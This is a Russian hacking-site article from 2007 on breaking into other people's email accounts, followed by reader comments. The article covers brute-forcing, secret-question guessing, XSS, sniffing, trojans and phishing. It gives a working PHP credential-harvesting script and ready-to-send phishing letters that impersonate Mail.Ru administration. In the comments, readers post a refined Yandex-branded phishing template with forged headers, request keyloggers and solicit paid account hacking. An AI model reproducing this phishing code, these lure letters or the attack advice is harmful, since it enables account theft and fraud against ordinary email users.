Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobaltsys[@]nm.ru
Элитный клуб общения с самыми красивыми девушками
pastila.com
На эту тему написано огромное количество статей. Взлом e-mail всегда был и будет актуальной темой. В данной статье я хочу рассмотреть некоторые способы взлома e-mail, некоторые из них лучше, некоторые хуже, но каждый имеет право на жизнь.
Брут - BruteForceБрут(от анг. Brute force - грубая сила) - это один из старейших способов взлома, не только e-mail, но и многих других систем(ftp, telnet…) Брут, проще говоря - это подбор пароля. Существуют специальные программы, которые делают это автоматически. Вам надо лишь составить хороший словарь, и скормить его программе, которая в свою очередь будет по одному перебирать этим пароли, и если какой-либо из них подойдет, то она известит вас об этом.
Самые популярные программы для брута - это Brutus и Hydra(сслыки в конце статьи). Brutus - простая в обращении программа, способная подбирать пароли к различным сервисам(ftp, telnet, pop, form). Hydra - аналог Brutusa, но более эффективная. Я не буду описывать как пользоваться этими программами, так как в них нет ничего сложного. В крайнем случае вы всегда можете задать вопрос на нашем форуме, там вам всегда помогут.
С помощью брута взламывать очень сложно, так как не факт что в словаре окажется нужный пароль, да и перебор всех паролей может занять приличное время.
Подбор ответа на "секретный вопрос"Этот способ порой бывает очень хорош. Часто люди ставят в качестве секретного вопроса - "Где я живу?" или "Какое ваше любимое блюдо?". Узнать где живет человек порой не сложно - вбейте его email в поиск на Yandex и если вам повезет, то вы найдете сайты где он любит бывать(форумы, чаты), и возможно там будет ответ.
На вопрос "Какое ваше любимое блюдо?" - очень часто отвечают "шашлык", либо "картошка". Так же порой ответом на вопрос могут быть фразы - "А тебе зачем?", "Спроси меня", "Не помню", "Не знаю" и тому подобные. Так что тут все зависит от вашей смекалки.
XSSЭтот способ очень часто применяют при взломе email. XSS - это межсайтовый скриптинг. Эта уязвимость дает вам возможность выполнять javascript код в броузере жертвы. Тем самым позволяя украсть cookie или сессию.
Использовать данные способ не просто, для этого требуются некоторые навыки. Но нет ничего не возможно. Для взлома e-mail вам потребуется найти XSS уязвимость на том сайте, где находится e-mail вашей жертвы. Сделать это не просто, и порой даже не возможно, но попытаться стоит.
Так же вы можете найти либо купить такую уязвимость на различных форумах. Люди часто продают XSS на mail.ru и XSS на yandex.ru.
СниферЕсли вы находится с жертвой в одной сети, то есть шанс, что вы сможете перехватить логин и пароль с помощью сниферов. Снифер - это программа для перехвата сетевого трафика. Существует огромное количество сниферов специально заточенных под отлов паролей от e-mail. На сайте www.seclab.ru вы можете скачать такие программы.
ТроянЕсли ни один из способов вам не подошел, либо у вас не получилось его реализовать, то можно попробовать послать жертве - троян. Троян - это программа которая ворует пароли, и пересывает их вам(хотя трояны бывают разные, и воруют не только пароли от e-mail). Чтобы жертва скачала и запустила ваш файл - вам надо написать какое-нибудь правдоподобное письмо. Например - что это обновления для антивируса, или новая версия Mail.Ru Agent. Тут все зависит от вашей фантазии.
ФишингФишинг - это один из старейших способов обмана юзеров. Суть его заключается в том, что вы создаете страницу "двойник". Вы просто копируете исходный текст страницы, и вывешиваете ее на бесплатном, либо платном хостинге. Обычно копируют страницу входа - там где юзеру надо будет ввести пароль. Когда юзер введет свои логин и пароль, то скрипт на вашей странице запишет их в файл, либо отправит вам на почту. Например:
У нас на странице есть форма для ввода логина и пароля. Будем исходить из того, то на том хостинге где вы разместили страницу - есть поддержка PHP. Если наша форма выглядит следующим образом:
<form action="enter.php" method=POST> Логин: <input type="text" name="login" size=30><br> Пароль: <input type="password" name="pass" size=30><br> <input type=submit value="Войти"> </form>
Я не буду подробно рассматривать каждую строчку, так как в цели данной статьи не входит изучение HTML, если вам что-то не понятно, то скачайте учебник по HTML и попробуйте разобраться.
Итак, наша форма имеет два поля ввода: login и pass. При нажатии на кнопку "Войти", данные из этих полей будут переданы скрипту enter.php методом POST. Скрипт enter.php может быть примерно следующего содержания:
<? $log = $_POST["login"]; $pas = $_POST["pass"]; if($log == "" && $pas == "") { echo "Please fill login&password fields";exit;} $file = "mails.txt"; $f p = fopen($file, "w+"); fwrite($fp, "$log:$pas\r\n"); fclose($fp); echo "<script>document.locaton.href="http://настроящая_страница";</script>"; ?>
Принцип его прост - скрипт получает логин и пароль введенные пользователем, и если они не пусты, то записывает их в файл, и затем перенаправляет юзера на реальную страницу. Теперь придумываем текст письма, и заставляем юзера зайти на вашу страницу.
Поздравляем - Вам открытка Это одна из возможностей использования предыдущего способа. Очень часто система @Mail.ru рассылает открытки, поздравляя с праздниками и днями рождения.
Вы составляете письмо якобы от @Mail.ru, и отсылаете его юзеру. Конечно письмо должно быть отправлено в том же виде как его рассылает @Mail.ru, так же желательно чтоб обратный адрес был такой же как от @Mail.ru.(как отправлять письма от чужого имени - вы сможете прочитать следующих статьях)
Когда все готово - отсылаем письмо юзеру, и ждем пока он зайдет на вашу страницу. Этот метод наиболее действенный на данный момент.
Лох - это судьба?Очень давно - году этак в 2001, я в первые увидел этот способ. В то время это был популярный способ достать пароли от мыльников. Суть заключается в следующем: На различные форумы рассылаются сообщения подобного рода:
"Привет! Я недавно узнал что у почтовой системы Mail.Ru есть огромный баг! Все дело в том, что у них есть сервис Восстановление Пароля, так вот, обработкой запросов занимается робот!! Который сидит на адресе password_robot@mail.ru Если отправить специальное письмо на этот адрес, то вам придет пароль от нужного ящика!! Письмо надо отправлять такое: Тема письма - ?password!(#newpassword#)!edit Кому - password_robot@mail.ru Тело письма: First - тут E-mail от которого требуется восстановить пароль Pass - тут любое слово Recover_new_password_for:тут ваш E-Mail Pass_For_Recover:тут ваш пароль Do_Now_Sig:0x00100111 Отправив такое письмо, к вам придет пароль!!!"
Естественно никакого робота нету, а E-Mail password_robot@mail.ru принадлежит автору этого сообщения и ваш пароль уйдет к нему. В настоящие время этот способ уже не актуален, так как каждый 2-й знает про него. Но до сих пор попадаются индивидуумы, которые пытаются развести людей подобным образом.
Социальная ИнженерияДля реализации этого способа, вам необходимо обладать навыками Социальной Инженерии(основы которой вы можете почерпнуть из статей на нашем сайте) Самый простой пример Социальной Инженерии для доставания пароля от E-Mail - это отправить юзеру письмо следующего содержания:
Дорогой пользователь! Мы вынужденны довести до вашего сведения, что ваш почтовый ящик в скором времени может быть закрыт, из-за недостаточной активности на нем. Чтобы этого не произошло - вам необходимо заполнить нижеприведенную форму, и переслать ее нам. Форма: Имя - ваше имя Фамилия - ваша фамилия Город - город вашего проживания Страна - страна вашего проживания Логин для входа в систему - впишите тут ваш логин(то что идет до @) Пароль - впишите тут ваш пароль Если вы не заполните данную форму, и не перешлете ее нам в течении 3-х дней, то мы вынужденны будем закрыть ваш почтой адрес. Дата - 21/05/2050 С уважением Администрация @Mail.Ru
Это самый простой способ. И не многие на него купятся. Но включите вашу фантазию, и придумайте свой текст для письма, и быть может вам повезет. (конечно этот способ можно использовать не только для почты на @Mail.Ru, но и на всех других)
Во общем способов много, и в этой статье описаны далеко не все из них, какой использовать - выбор за тобой =)
© s0 14.04.2007
Сначала послал угрозу.
Через час послал во это.
Дорогой пользователь!
Мы вынужденны довести до вашего сведения, что ваш почтовый ящик подвергся атаке с
<IP 81.9.68.140>
и может быть закрыт, из-за подорваной безопасности сайта.
Чтобы этого не произошло - вам необходимо заполнить нижепреведенную форму, и
переслать ее нам.
Эта операция потверждает что данный почтовый ящик не перешел к другому владельцу.
Форма:
Имя - ваше имя
Фамилия - ваша фамилия
Город - город вашего проживания
Страна - страна вашего проживания
Логин для входа в систему - впишите тут ваш логин(то что идет до @)
Пароль - впишите тут ваш пароль
Если вы не заполните данную форму, и не перешлете ее нам в течении 3-х дней, то
мы вынужденны будем закрыть ваш почтой адрес.
Дата - 20/01/2008
С уважением Администрация @Mail.Ru
Вобсче ты молодец,супер просто.
Как почитаеш всё просто,как начинаеш пробовать нихрена неполучаеться.
А научиться хочеться.
Уж очень хочеться таким способом наказывать тех кто на Россию ругаеться.Это моя мечта.Только вотесчё неразу неполучилось.Чегото я недопонимаю.Где вобсче нормальный набор паролей взять?,тоже непойму
Словари с паролями можешь взять например на http://passwords.ru/
Да нормальная статья. Все просто рассказано. ;-) Предпочитаю сниффинг с использованием UNIX. Гы-гы-гы-ы-ы. :-D
Не вижу принципиальной разницы между взломом e-mail или другой собственности жертвы от кражи кошелька, машины и проч.
Нужен человек, который реально умеет вскрывать почту, может подскажите адрес.Я уже отправила по многим адресам, но ответа нет, наверное, уже не действующие.ОЧЕНЬ НУЖНО!
Сообщение отправила насчет профи по взлому почты, а адрес забыла написать. Присылайте на fdrpochta@e-mail.ru, заранее спасибо.
to Светлана:
У вас только один выход в данной ситуации - научиться взлому самой. Я очень сильно сомневаюсь что вы сможете найти того кто для вас все сделает а если и найдете то это будет стоить денег. Что уже само по себе не является хаком.
Сталобыть просьба на будущее - проводите подобные поиски в других местах.
бля социалка рулит :))
mersi
блин, а где же ссылка на bruts...
И ГДЕ ССЫЛКИ?
ужас мля...кобольт кого ты набрал то? гони таких "авторов" нах из команды!!!!
Салам всем! Отличная статья! Я только сейчас понел, что однажды уже повелся на этот метот с роботом_майл. Прикольно!
Islam эээ слющай, ты зачЭм пароль отсылал, а?ты баран да?
to Еврей: Вы чо, гоните что ли, вас ведь сообщение Islama не затронула никаким боком. А оскоГблять людей ни есть хоГошо ;)))))
еееееее читать не охота просто скиньте программу и всё
старые, прописные истины...
Всем хай) Помогите пожалуйста как взломать почту? Я почитал тут...НО контрольный вопрос у почты, которую я хочу взломать Имя мое собаки/кошки...я уже перепробывал все клички, которые знаю и в инете пошарил..никак не могу ответитьна этот вопрос...помогите плиз может какая то прога есть или как мне ответить на этот вопросик)
Илья, вам поможет Социальная Инженерия (СИ). На нашем сайте статей на эту тему хватает.
Кароче нужен чел шоб мог мне раздобить(пусть он его ламает, валит любими СИ и т.п. мне пох**) пароль к е-мейлу на mail.ru за WMZ конечно. Буду очень благодарен если найдеться такой человек. Отписевать мне на <---цензура администрации---> Администрация обращает ваше внимание на недопустимость подобных комментариев с просьбами хакнуть/взломать/раздолбать/etc.
А всетаки умные вещи написал. Спасибо!
vzlom
Подскажите пожалуйста где взять прогу которая бы записывала все нажатия клавиш с клавиатуры. Проблема в том что мне нужно узнать логин и пароль которые вводятся с моего компа. и вообще существует что то в этом роде. Или мож подскажите как проще узнать?
Прикольно а де силка?
.:Воистину лохами русская земля вовек неоскудеет:.
Да, ребятушки-дурбадушки, посмотрю я на вас, родненькие и думаю, или всем или через одного....
Социальная инжинирия....Тссс)))) Ржу как Пржевал...
Вы бы ещё Практическое применение Нейро-Лингвистики выписали........
Вобщем смысла - 0%, а пару с дымом полнабочка.
Такие все умники, а как коснись дела, то язвы на серванте устранить не можете (на этом же)....Противно слушать, извините...Дай Бог на этом ресурсе появится умным опытным программистам. Удачи.
echo off;
_______________
А главное все ваши потуги в разрушение, а когда созидать будете, ламеры?
Выставил бы вас всех у стенки и растрелял бы!
А прога для подбора логна и пароля в онлайн играх ? =))
Мда, старенькие способы, как сам мир...
Мда народ... способи старие..прог в нете хватает..исходникофф тоже!но не хакните ви никогда...ибо впадло кодинг учить..обидно!
теперь ты повериш
Народ подскажите как взломать мыло?
Прост я играю в WoW(World of Warcraft) и я знаю несколько емэйлов на которые зарегины аки
To Игорь.
Попробуй скачать брута!Заодно не забудь скачать словарик.Настраиваешь брута изнутри,запускаешь и ждешь!Долго но если брут и словарь будут нормальными,получишь ты свое мыло!
Сёмен скинь сылочку для нормального словарика для брутоса! оч благодарин арание
super
Хуй его чихел мешикани
меня ета фишка с взломом не фурычит помогите плиз!!!!!!!!!!!!!!!!!!!!!!!!!
Я видоизменила письмо и исправила ошибки в русском тексте))) Как мне кажется, так более правдоподобно)
смотри ниже
Дорогой пользователь!
Мы вынужденны довести до вашего сведения, что ваш почтовый ящик подвергся атаке с
<IP 81.9.68.140> и может быть закрыт из-за подорваной безопасности сайта.
Статистика атак: (тут пишите че-нить заумное)
Чтобы этого не произошло - вам необходимо заполнить нижеприведенную форму, и
переслать ее нам, с сохранением в письме Статистики.
Эта операция потверждает, что данный почтовый ящик не перешел к другому владельцу.
Форма:
Имя - ваше имя
Фамилия - ваша фамилия
Город - город вашего проживания
Страна - страна вашего проживания
Логин для входа в систему - впишите тут ваш логин(то, что идет до @)
Пароль - впишите тут ваш пароль
Если вы не заполните данную форму, и не перешлете ее нам в течении 3-х дней, то
мы вынужденны будем закрыть ваш почтой адрес.
Дата - 9/08/2009
С уважением, Администрация @Yandex.Ru
"заумный текст" например:
<Received: from localhost (localhost.localdomain [127.0.0.1])
by webmail103.yandex.ru (Yandex) with ESMTP id 51A2593C4DE
for <МЭЙЛ ЖЕРТВЫ>; Tue, 4 Aug 2009 22:07:43 +0400 (MSD)
X-Yandex-Spam: 1
X-Yandex-Front: webmail103
X-Yandex-TimeMark: 1249409263
Received: from [81.9.68.140] ([81.9.68.140]) by mail.yandex.ru with HTTP;
Tue, 04 Aug 2009 22:07:41 +0400
From: =?UTF-8?B?0J/QtdGA0LXQv9C+0L3QvtCy0LAg0J3QsNGC0LDRiNCw?= ru
Subject: =?UTF-8?B?0LjQvdGC0LXRgNC90LXRgiArINCU0LXQstGD0YjQutCwIC8g0J/QsNGA0LXQvdGMIDE3LTIwINC70LU=?=
=?UTF-8?B?0YI=?=
MIME-Version: 1.0
Message-Id: <129091249409261@webmail103.yandex.ru>
Date: Tue, 04 Aug 2009 22:07:41 +0400
X-Mailer: Yamail [ http://yandex.ru ] 5.0
Content-Type: multipart/mixed;
boundary="----==--bound.12910.webmail103.yandex.ru">
Спасибо за информацию
бредятина! никакая прога никакая там уловка шас неработает ! лучше голова на плечах!
2unixsys: у тебя-то как раз её и нет, или она набита свистелками, опилками, и перделками, но никак не тем, чем нужно, если такие неаргументированные ничем посты создаёшь... Все изложенные в статье метода актуальны досихпор
Почитал, поржал, вылез испадстала и захотелось написать)))) Фсё туфта по мылам, инженерия не канает, брутусом взломать пароль типа trI7B6kf ваще невозможно, подбор ответа смысла не имеет если хочешь просто смотреть переписку друга, врага, конкурента и т.д и т.п. Так шо ребя не теряйте времени даром))))))
там у меня яндексе кое какие денежки лежать обратный связь просить идентификацию через натариус заверенный здесь такого натариуса не нашел чтоб заверили заявление мне как забрат денег
CrashBoom, если руки из жопы и мозгов нет, то вообще ничего не проканает..
"инженерия не канает" - а это вообще сложило попалам в истерическом припадке))))
Cплошное бла бла бла
Информация хорошая, но не столь полная...
Не 3,14зди =)Cплошное бла бла бла
Если есть честные люди которые без предоплаты за 60% от суммы могут помочь вывести деньги с cashmails.org или подобных сайтов стучите в асю 634-701-818,а то одни мошенники попадаются которые строят из себя всемогущих хакеров а на деле им нужно только высосать любыми предлогами деньги за обещанный вывод
Я не могу придумать пороли скинте мне пожалуйста skorpion_4@mail.ru
пришлите плиз, логин и серийник к проге EISA Recovery. надо ломануть мыло на яндексе. мой адрес: alexpanco@yandex.ru
Http :// www . gaap . ru / news / Gaap _ ifrs /1739.
мыловарение в домашних условиях
Warm floors In floor heat Underfloor heating
Спасибо хорошая прога